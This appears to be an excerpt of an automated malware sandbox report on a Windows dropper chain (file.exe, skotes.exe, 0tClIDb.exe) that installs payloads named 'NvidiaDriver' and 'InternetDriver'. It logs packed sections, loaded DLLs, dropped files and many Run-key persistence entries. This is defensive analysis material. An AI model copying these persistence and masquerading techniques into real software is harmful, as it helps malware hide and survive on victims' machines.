                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: webio.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                        Source: InternetDriver_cef09dcf6b774f79a4710801a7f389d4.lnk.9.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_de66a07cc206428089333ea38f399555.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_9a81a00d066d4bfa82dcac5a08bde51a.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_6719133747fd44faaab1433219bf7dc9.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_35c5431ed5714ae89884a986955f0da4.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_18ffc5a1725442b398f31d86a5253020.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_67e78d46677546c8a89b0be1cc1a70da.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_dd570d0f421f4e5797a46bcd9f0fa633.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_29431715c0454c79b9fd4c99c9087c86.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_cad9115b911f4737b404433fa80c2364.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_e7801b58c00345e5af02a481fc6970b6.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_461994a0584e408eb3dcf4bd676ca6d8.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_3d05c516b5834b8dabc47ef19f64e664.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_d0714fc59c6f40cb8ea795c5e1717a6b.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_ac4144b37c7a4eae9106eb435fb53e9d.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_cdaecd11468d45dea4c17641898fa3be.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_2e4768b1e3b147a5bd970a59e886abc7.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_5076c9e3d6c54857a127aabaa9953371.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\InternetDriver.exe
                        Source: InternetDriver_2b2dd6f89d0648b49b19fb6d0049ab97.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_9c42162aa6064cf496382fa5fa9e7a59.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_40a333e62b3245feb9875db00366e537.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_318d6c1d27b14600820d5c1954e1143f.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_0337b408af9a4e6b835026f5a14df7c8.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_3e2c4608ee2c413ab2c52f7c591fe146.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_0a509360e9e545b68da05213f779415b.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_c7fb3b173d3247c7ad4c060c7997efda.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_5d5114f2b78945199c3be89ad614c09d.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_4472c0c28e264555be93599bae62b8a6.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_e4d4afef04e44d44933a3a176b275626.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_47f9cda654d3460a8bdfb32342b71236.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_ac3b4eb0820a4042991d922e6cef16b2.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_e6036c26af1d43118879e0a8a36cf924.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_f7e0cbcf85e84f73b37791fc6a985ab9.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_eb561c1a12034c2eb4d4d4327700c0ed.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_782e4936eddf44dd94468e70166fe8b4.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_3c7b8f1e8ee94038b44eaf24fa1b18f7.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_e2d3d741884b43529853ff8c87ed5336.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: InternetDriver_fc0a8a6f5b474d09838b74de29eeb11f.lnk.10.drLNK file: ..\..\..\..\..\..\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                        Source: file.exeStatic file information: File size 3296768 > 1048576
                        Source: file.exeStatic PE information: Raw size of fuapnweu is bigger than: 0x100000 < 0x2b9000
                        Source: Binary string: C:\DEV\C#\LKSM\WinApp\WinApp\obj\Release\LKSM.pdb source: 0tClIDb.exe, 0tClIDb.exe, 00000007.00000003.2678870606.00000000058A4000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678870606.000000000589A000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2692361046.00000000058A4000.00000004.00000800.00020000.00000000.sdmp, 9DNEMG3H6COYF8VY.exe, 00000009.00000000.2678750378.0000000000722000.00000002.00000001.01000000.0000000A.sdmp, InternetDriver.exe.10.dr, NvidiaDriver.exe.9.dr, 9DNEMG3H6COYF8VY.exe.7.dr

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.490000.0.unpack :EW;.rsrc:W;.idata :W;fuapnweu:EW;sdiwzxtv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fuapnweu:EW;sdiwzxtv:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.ac0000.0.unpack :EW;.rsrc:W;.idata :W;fuapnweu:EW;sdiwzxtv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fuapnweu:EW;sdiwzxtv:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.ac0000.0.unpack :EW;.rsrc:W;.idata :W;fuapnweu:EW;sdiwzxtv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fuapnweu:EW;sdiwzxtv:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.ac0000.0.unpack :EW;.rsrc:W;.idata :W;fuapnweu:EW;sdiwzxtv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fuapnweu:EW;sdiwzxtv:EW;.taggant:EW;
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeUnpacked PE file: 7.2.0tClIDb.exe.dd0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tgrwqosf:EW;iapomrjr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;tgrwqosf:EW;iapomrjr:EW;.taggant:EW;
                        Source: 9DNEMG3H6COYF8VY.exe.7.drStatic PE information: 0x90BFB95C [Sat Dec 15 10:52:12 2046 UTC]
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                        Source: InternetDriver.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x8af0
                        Source: NvidiaDriver.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x8af0
                        Source: 9DNEMG3H6COYF8VY.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x8af0
                        Source: 0tClIDb.exe.6.drStatic PE information: real checksum: 0x1d075d should be: 0x1d85d6
                        Source: 0tClIDb[1].exe.6.drStatic PE information: real checksum: 0x1d075d should be: 0x1d85d6
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drStatic PE information: real checksum: 0x194c4a should be: 0x16d625
                        Source: file.exeStatic PE information: real checksum: 0x32d0d7 should be: 0x32c76d
                        Source: skotes.exe.0.drStatic PE information: real checksum: 0x32d0d7 should be: 0x32c76d
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name: .idata
                        Source: file.exeStatic PE information: section name: fuapnweu
                        Source: file.exeStatic PE information: section name: sdiwzxtv
                        Source: file.exeStatic PE information: section name: .taggant
                        Source: skotes.exe.0.drStatic PE information: section name:
                        Source: skotes.exe.0.drStatic PE information: section name: .idata
                        Source: skotes.exe.0.drStatic PE information: section name: fuapnweu
                        Source: skotes.exe.0.drStatic PE information: section name: sdiwzxtv
                        Source: skotes.exe.0.drStatic PE information: section name: .taggant
                        Source: 0tClIDb[1].exe.6.drStatic PE information: section name:
                        Source: 0tClIDb[1].exe.6.drStatic PE information: section name: .idata
                        Source: 0tClIDb[1].exe.6.drStatic PE information: section name:
                        Source: 0tClIDb[1].exe.6.drStatic PE information: section name: tgrwqosf
                        Source: 0tClIDb[1].exe.6.drStatic PE information: section name: iapomrjr
                        Source: 0tClIDb[1].exe.6.drStatic PE information: section name: .taggant
                        Source: 0tClIDb.exe.6.drStatic PE information: section name:
                        Source: 0tClIDb.exe.6.drStatic PE information: section name: .idata
                        Source: 0tClIDb.exe.6.drStatic PE information: section name:
                        Source: 0tClIDb.exe.6.drStatic PE information: section name: tgrwqosf
                        Source: 0tClIDb.exe.6.drStatic PE information: section name: iapomrjr
                        Source: 0tClIDb.exe.6.drStatic PE information: section name: .taggant
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drStatic PE information: section name: /4
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drStatic PE information: section name: /19
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drStatic PE information: section name: /31
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drStatic PE information: section name: /45
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drStatic PE information: section name: /57
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drStatic PE information: section name: /70
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drStatic PE information: section name: /81
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drStatic PE information: section name: /97
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drStatic PE information: section name: /113
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004AD91C push ecx; ret 0_2_004AD92F
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A1359 push es; ret 0_2_004A135A
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00ADD91C push ecx; ret 1_2_00ADD92F
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00ADD91C push ecx; ret 2_2_00ADD92F
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ADD91C push ecx; ret 6_2_00ADD92F
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AFDEDB push ss; iretd 6_2_00AFDEDC
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ADDFC6 push ecx; ret 6_2_00ADDFD9
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80EF9 push ebx; ret 7_3_00C80F99
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80EF9 push ebx; ret 7_3_00C80F99
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80EF9 push ebx; ret 7_3_00C80F99
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80F9A push esi; ret 7_3_00C80FB1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80F9A push esi; ret 7_3_00C80FB1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80F9A push esi; ret 7_3_00C80FB1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80F9A push esi; ret 7_3_00C80FB1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C809B3 pushfd ; ret 7_3_00C809E1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C809B3 pushfd ; ret 7_3_00C809E1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C809B3 pushfd ; ret 7_3_00C809E1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C809B3 pushfd ; ret 7_3_00C809E1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80F9A push esi; ret 7_3_00C80FB1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80F9A push esi; ret 7_3_00C80FB1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80F9A push esi; ret 7_3_00C80FB1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80F9A push esi; ret 7_3_00C80FB1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C809B3 pushfd ; ret 7_3_00C809E1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C809B3 pushfd ; ret 7_3_00C809E1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C809B3 pushfd ; ret 7_3_00C809E1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C809B3 pushfd ; ret 7_3_00C809E1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80EF9 push ebx; ret 7_3_00C80F99
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80EF9 push ebx; ret 7_3_00C80F99
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80EF9 push ebx; ret 7_3_00C80F99
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80F9A push esi; ret 7_3_00C80FB1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C80F9A push esi; ret 7_3_00C80FB1
                        Source: file.exeStatic PE information: section name: entropy: 7.091531284941182
                        Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.091531284941182
                        Source: 0tClIDb[1].exe.6.drStatic PE information: section name: entropy: 7.983163637915071
                        Source: 0tClIDb[1].exe.6.drStatic PE information: section name: tgrwqosf entropy: 7.953498094067115
                        Source: 0tClIDb.exe.6.drStatic PE information: section name: entropy: 7.983163637915071
                        Source: 0tClIDb.exe.6.drStatic PE information: section name: tgrwqosf entropy: 7.953498094067115
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeFile created: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0tClIDb[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeFile created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeJump to dropped file
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeFile created: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_b7f403d427dd4c4797c6de880996ae9eJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_28ad21eac4844c0f9fd2a61c5bb412c1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_5fb642a978ef46ad8babc9faf499af6cJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_65e75b2ecd364929acc31930f272d177Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_41c478a1bd2342b88270b91a0df5f087Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_f1f5be2991ff4378aa04280f68f2731dJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_8630aa22d8f8447f80b461615583d4f2Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_0765bda3d5fe4b4c9f38906a3576db2fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_468ca0ebc2464ad1addaa7c10eb3dff6Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_01f5a14ab3654771aa2b02ec3ef86ec7Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_fea82d6593394f6f8b93c4ec7bd2f15eJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_9886616d44f44e36ac8eb72511e99fd5Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_5d927519720546599f9ee15ceecbdc9eJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_98c017189ac44e4caa3f411a0cc7df75Jump to behavior
